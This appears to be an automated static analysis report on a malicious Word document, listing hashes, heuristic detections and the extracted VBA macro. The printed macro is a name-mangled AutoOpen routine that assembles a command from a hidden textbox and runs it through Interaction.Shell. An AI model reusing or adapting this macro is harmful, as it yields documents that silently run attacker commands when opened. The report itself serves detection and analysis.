Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bea2285be0232ccc…

MALICIOUS

Office (OLE)

87.5 KB Created: 2018-12-13 09:54:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 2834f4545139ca5830131caaa40759f7 SHA-1: 38487e2d53132fa6c87984990e6d77046f02fa31 SHA-256: bea2285be0232ccc6ff21d158f58391fafebba4db6ce6c5d711c4b5954cd45e4
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is designed to execute automatically upon opening the document. Heuristics indicate a suspicious invocation of cmd.exe and a Shell() call within the VBA code, suggesting an attempt to run arbitrary commands. The ClamAV detection further confirms its malicious nature.

Heuristics 9

  • ClamAV: Doc.Trojan.Agent-6784316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6784316-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
.Shell(zvGMzbTsXdP, HjqNvZolnRk), QHKNzwhGE)
   Set FYIWjoombpttBpKW = bjhcjFFCSOtFwkDwrl
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ihONzwcb
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9112 bytes
SHA-256: 86cf8eed85f3b7862b4a5608ae7e9f07c5c1bba5b105606f822eafa166cf8143
Detection
ClamAV: No threats found
Obfuscation or payload: likely
248 of 287 identifiers look randomly generated (e.g. 'HRIiLJDHvwzWsfkTjmwQGiwj') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KEdGFAwTPq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ihONzwcb
End Sub

Attribute VB_Name = "kRCfABPW"
Function ihONzwcb()
On Error Resume Next
   Set qmmCtHUZSCICJOwraR = iFLSGSWtmwElLthShJrRZFab
   Select Case haUlPhJinIPfTfjXOibNQ
      Case 324049384
         cvRhjzYdijjZsBI = QuCYlRnOdHtLXzOSjS
         pwzajOikvjGrVFLKSOZXKIC = 26297805
         GNGfVRpZJSYRUTJGhri = QXFLpvDKuhhwvwcBYFa
      Case 119985208
         RMnnswvPQdQXjLiIu = CByte(ZNficlcWVqIhcRMHwLRXwz)
         viERYPnttiPAEkm = ChrW(CLWcEHjAwLYMXqXtcEjAY)
         DGiwODNRHWMbPMZUEo = Log(DSNqaWCHVXzBlKiHPuHsfnh)
   End Select
   Set wnufZitGKhEApGQjajzjA = dJQubAmJoOPjTzPJBwipri
   Select Case FqjQlZGiwiGJlPiCtTAsqkJ
      Case 258559764
         QQiCBKwvPKEsjBkhf = zModuXtpVrpDUjvwU
         bjvXHOWEZKJSQLK = 121730859
         admWGIMpHFLqXwkj = GzXZFaHpzjfCbisBVVV
      Case 225545471
         VYiiAIKOCNYmoFLvlUDihJ = CByte(jmjaToCbPwpkborFRzb)
         WGQmZjGjARDELzBwTiqZAmIn = ChrW(UkGuPmjGNCaVtBmhSawulZbm)
         ljGBujzcnFwAplfWwwzbaaj = Log(riLKtNvJTzdDaE)
   End Select
   Set IiSAXuFupJflDBnirbtv = LnrRpzHCwNAqIX
   Select Case pbZwZkKXpzJISnzt
      Case 211105721
         iwrajhvwrsvivvdbsQB = WPBPCSfrpOwUURiaTOrrDbsR
         KDOiqujskCOvbYRCDId = 319538121
         JdQDIiYKrvWknrOQMzT = bjPPfrpaozSPUAAa
      Case 328757651
         hQLhsGsKohDmrJKkzZO = CByte(XQowVscHPnqnSk)
         DAuqIWUDIWCHIFkAa = ChrW(wDRbNLAdkvAqPTHs)
         jFjFiDNjbTkUCim = Log(bWhzbniqimZCRHjAQ)
   End Select
   Set maXSEZzjYWtjRIjFim = DSstwzufSFpVWXAzJf
   Select Case ZRYofKBzkhuPZWRnBthaTK
      Case 298868784
         bjAXJQLXZsNFidMivzJw = pQzEkzDbFSOYrNwJdqT
         WpjIMIYhzfTAuIlTBS = 165502196
         HvUZzjnPQYRJpcBzj = sbaWcZzNdjccHLRCObUGJf
      Case 143304468
         QaOKKSHljLZzqlT = CByte(alDDnnQGsnOafcjNFSFCLpCL)
         qtwlTLcHZjYcRVdJHSX = ChrW(jGHiMsYfRkkirc)
         uUUYclSFvIlnwcsDXfHuklRZ = Log(mzqpvpkpYipntuSOALW)
   End Select
   Set dlkLEZGDKVQjSuA = hHzbivLHRfApLSRZifLu
   Select Case PqZPHivswUGHksitTbiactYY
      Case 113498868
         rDrBniFdRQYMWMPPTKuhaam = ODdUVWSAzOqrAwhXCGaN
         GEVLNZNijRRQMnjFlH = 310698091
         YOHVXPXdXfUzZJHwHJIzEWOz = aoJwSQwfPzrzAnwCkHD
      Case 322578593
         rCfkwczztBAKzwaNf = CByte(PWTKMPBHVKuUPKA)
         jliNUozhVvrmCrX = ChrW(ECoazhqPiqGoDYmpKrNojR)
         aWloQYPEinGQMWZGCvOid = Log(LiwIBbLiiFmRNENsaqTmc)
   End Select
Const HjqNvZolnRk = 0
   Set bwwiiKQqAYwcQnBZDYowQjP = ilncnKCDfwdNlKEXa
   Select Case TRoXthrjzufjdvhjAsWnC
      Case 278044175
         swTJoosTRWjNwbHsGl = NIYwTifEKMAmicv
         aZXCrEbOMwhjFsAQCvdNTAAb = 56007809
         iHQjzkCjjSiiPIjKjWAww = LkjmzhbaZwuHVTzdz
      Case 321539591
         ZMihUfUjJQdaLlRvfzLk = CByte(EGtmnInMMGXEQZFdDP)
         fBSJvViVEYSdnLL = ChrW(FouhWhTwKGWvMLSbkD)
         TmzzRFnioucjsEF = Log(oJhlwhWwpzmIsFrtkGsiHqdc)
   End Select
   Set HRIiLJDHvwzWsfkTjmwQGiwj = zXcJHishmEFjPUwwsHVQwc
   Select Case RMvmtBsYVZtOmawoU
      Case 45588062
         GafkRRAROabSsUHLwLrwjt = jKVGJXuTAJHVpmciVsji
         uGAtiPBcdIJMuvavLrtUHaJl = 334934910
         ZUhWFwPhpEUMiIsqX = wJurCiJBqKqTwP
      Case 308169282
         qhvGCMzNFWazMlbR = CByte(InpYhRwMEGFqWH)
         RSSLuQwlMhmjIKo = ChrW(iZRobFoIPzuwGr)
         jOVhuTQWlJCcqvlqBP = Log(WRESdMdJwzVAiU)
   End Select
   Set BURUJEVOnQpEJnlkNB = nqzIZTwIQqqGmKPCPPcIl
   Select Case DljRULHVtNwscjE
      Case 76430757
         AKvEXzJCttkWUltwfnLZIzm = uzcKtijwDXbzpD
         oZOaRXzYbDuwtsmjBYvJ = 172709507
         zJLKlSzJvJcGXzuZVd = YBHzlpGRoaZutFTaFOHlhbS
      Case 52329439
         UmUnobCSOCTsJZVfAIiVP = CByte(BEYpKOrNwizORDlizwWbi)
         zivplFjTjmVllP = ChrW(zRoaBFlsuIStWIkwn)
         zFptUcmhdzMsjR = Log(PAjhAdwOpAjTLJKzni)
   End Select
   Set vWwGpSZNIEOwJk = rdWMROTvaSdOqtj
   Select Case mWQECNsotRjbQzMLrDHbwb
      Case 237226298
         cbWnLDiTZPcatjEdkiTAhs = cFRXmmHsKlccarEcpiMB
         VlSLwdqNIjGkwt = 224083945
         jvhRXRoQDdlfGdSUqdGUzLo = QiCCWrdwWiJmfjd
      Case 28638696
         BHUrKHiRltTnNuUHYAtOmtMz = CByte(JYUjpHzCWzETRGWXllwKKI)
         oiGikpKIvVDBjJlvmTlqwQ = ChrW(GuWrAIOpdAkfBiYPMMpIwO)
         nNApLqZRrYqAnN = Log(KzhfaBzijNODYiHHprqjdASC)
   End Select
   Set vtkqFLBvJqJZnYtsIzlRji = rzTlrKRliFJibZrY
   Select Case UXwjPFpcQkJiklDMjs
      Case 292141864
         aKlrEiUiqSTQYQwMmjcsdI = ZHDuTFVujwmuKmEbklL
         zQsKUorazPAIRiLjBkAYVX = 253577099
         lVmahFrHRWdIPsZiO = vQwddcaUaAknQaiaYwCQsuY
      Case 295163743
         uEDUIKVJabVTIsKANfrWiGD = CByte(oUbcwBBsGniXXzRpOipw)
         HQGsQfPjWMoBYjn = ChrW(tKZacNVJmcONCHzQEVjEU)
         hWlMjatWwSdFVTQXjuvzF = Log(RBiOMYwDAjPIdDoQduPQiv)
   End Select
   Set cqGZpmzZUJpqljTAtjzKj = UziHPijJTnzZta
   Select Case CrlRotQCnwPlhPAvhDX
      Case 143157589
         qiXTsLpBtLpsZqp = ssLEvvIAtzuTsPWV
         RLINwvhbAtmZsHY = 71684979
         oKMRNvZXZtRVJdpUnHijw = wdcuCWaArVIIbLInEQjqYBQ
      Case 36341903
         PzFFzuikuOioSsDwZCwMACd = CByte(zDNwIVuNXDnZVura)
         YjzawlXjtzzUsqMTuGwj = ChrW(bZTVRPFdaiLVicWjlBRpQ)
         WvtiMaFboutwwHdEj = Log(SCTUowJOqnIFirRNCY)
   End Select
zvGMzbTsXdP = KEdGFAwTPq.TextBox1 + fOCjUwX + fYzqQ + BGuUwkSS + niTdYX + CfjEFc + bkcliUD + RhSEv + IzYGwKw
   Set DIBdUpNszShIXiwzGVLbun = MYOzqdcJINbwZRfZDH
   Select Case CFPnzjPvZLvctPlpEFsXPXJ
      Case 163926353
         vmZjbwHUAlRzlRQbiDwMlhj = bbTLjifwqtBtqOwOnHsdTs
         ocwjTKLJNGkFzdwkWG = 134858153
         rPWlTEjZdoCUjHi = nzLlijnnFJwlrXWXzlbZF
      Case 72349364
         PbmfYDPVrzNzYuic = CByte(bifJGwhGRfVwjEd)
         kwKrDOkpnGliZwcQITwW = ChrW(DJcFZGYuXLukUnwXkEMw)
         WzMDjTCEpNGGzhnimiHLvQ = Log(rtFKdtYOlYphJPBtnVqiwoi)
   End Select
   Set zLIRpZkbKqdXqaqlkUjzA = TvnwRGlRpNDUzYPcszzMEOS
   Select Case NlsMLavMlIsNdr
      Case 52654424
         ptBPTVcSWHbiwnmFdjkj = ZFPSrjofBzBpWWKM
         ksIapDwNOzVnku = 40870400
         PPnmzcmnmUIZscQcsaz = XnjCQEdlTsREvNGGWaFHFVo
      Case 142315917
         YUmjtvJvNEcflVszAUtCEii = CByte(KFRVrmBwOHskrEZzIJ)
         JdalFMIFAuTqupQWodoEa = ChrW(dRddIIvuwuvwVr)
         TMIihBEvRzuailTTEHGAJ = Log(bDAJFwZvzTYnURf)
   End Select
   Set RzSwPHhWNpkzpYHStsFG = qJowMYYYrSpsaPz
   Select Case TSwkjLwwoFDzawZZqWapi
      Case 340300686
         iJzWXuEPIJiaaI = biLsIGVbwtsQCDoIGT
         ObipbBkqunsYwRUvw = 200186405
         rwNhzciiBLTBcGMuusojq = QanFUtzhHsdUcSAtjNw
      Case 156788205
         iblQSmWaDHuvTfmuuIliT = CByte(aYHittAJbnSplz)
         pCHcHEliZJmNwo = ChrW(LtOaANIntcZufHc)
         tntEFdBLzpphUHjCUWbZ = Log(LznjOOziJGbzfsZFkzh)
   End Select
   Set qfiGJIzPsKoCKXjdq = RmdwHbaEkHYFAzKGIlHKiQN
   Select Case rJBZZmoLviYYorXCjEXqrn
      Case 63965433
         sDOuVjPBYoHwaAfwSMJWZmR = NEiZsWzEzKhVXtqPP
         zAkZcfZZYidnSFmzjR = 8230127
         ICqCwQTJaYWtHCmRhoczAT = TaMsbjaMZOaOzJhbMLPwzHkf
      Case 101768965
         UQsoBooEXclYraAMzi = CByte(ooHzNPnkVwLqhcIOJUkNl)
         smFpoUpwnKFwaiNRiZN = ChrW(TGMlEviLqrNRwP)
         VuXbTuXKBkjBiAspKzjFmZTl = Log(mdHvwnBLisXGzuJwvLBVtEK)
   End Select
   Set jCSflJofRDiNzUcP = CmRUoXdkWZHCjEP
   Select Case cqvTPftKwEwcUZlvLLfJIrv
      Case 206940933
         uOjhchzTVWdjvpXsGXkYAQ = nLrXYFilvQiVQKcUWzJwCIPP
         HRCTLGodRvWlJaNnli = 104387690
         THiiDNZrRufwbBQoj = jKpswOFjMZvLRZzwD
      Case 919567
         XQzjzLXQaJIJZHTwFbaJT = CByte(UBAvGdFwcwQFIBmdsjb)
         fZEPWDzatWcqPwwwjBEtKdhJ = ChrW(TwRMcjtiWtuwkZCffCFWaqJ)
         pwqchnBsvWCFjOR = Log(iItFBAvcBNfbbmSdpLWfsR)
   End Select
   Set jMJjaoUGTApfni = sZmHZKQnOoPOcwjWR
   Select Case WVhGVNutwHlGQBpcDwMwjuQ
      Case 165407933
         sLasHkiYoRIklEZNfLICIXN = zumKUHcEILcBUBrWHic
         jrSsnjDiIWmVzAtMwUDho = 27225177
         ZbXtiUluZvctHctWlDt = lZHETHiYnfuvbPsRQpYOWcMa
      Case 137218461
         mkEzRdvHqATTaXp = CByte(HuAhRrkcGvffZJMh)
         LVuUpNRAUZrwzPBYJURZn = ChrW(uAbrVwPhjnmjOCvsShjjwSs)
         JjiGQpvHvUatswsTkmsD = Log(NAzcQCkqHucHzhpT)
   End Select
sCBNWzzR = Array(SoRzEEpB, aTIaRI, YPUrl, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(zvGMzbTsXdP, HjqNvZolnRk), QHKNzwhGE)
   Set FYIWjoombpttBpKW = bjhcjFFCSOtFwkDwrl
   Select Case zzWFwViOwlLUwvCwDNlWSCTR
      Case 170204996
         hcFqzKEOWVFblGArHQGuwKwm = iGOdwjFfAoGIIoAPiYhscciW
         vCKfzXjSqOEqlapAvkS = 303392352
         zcGiNlOuXFcsCBduzARaq = awZwwrrjrMbswaEBl
      Case 246249698
         YSIcwjYLFvkATshBJ = CByte(RnXCqNQQJFDqwOj)
         SwRUbNZjllHLIAO = ChrW(uwUzuVbuMhZTHPzVUKa)
         jpdDOqQFFEIJqivBuiPwX = Log(ItnFYWnmqwZfpFTQjD)
   End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.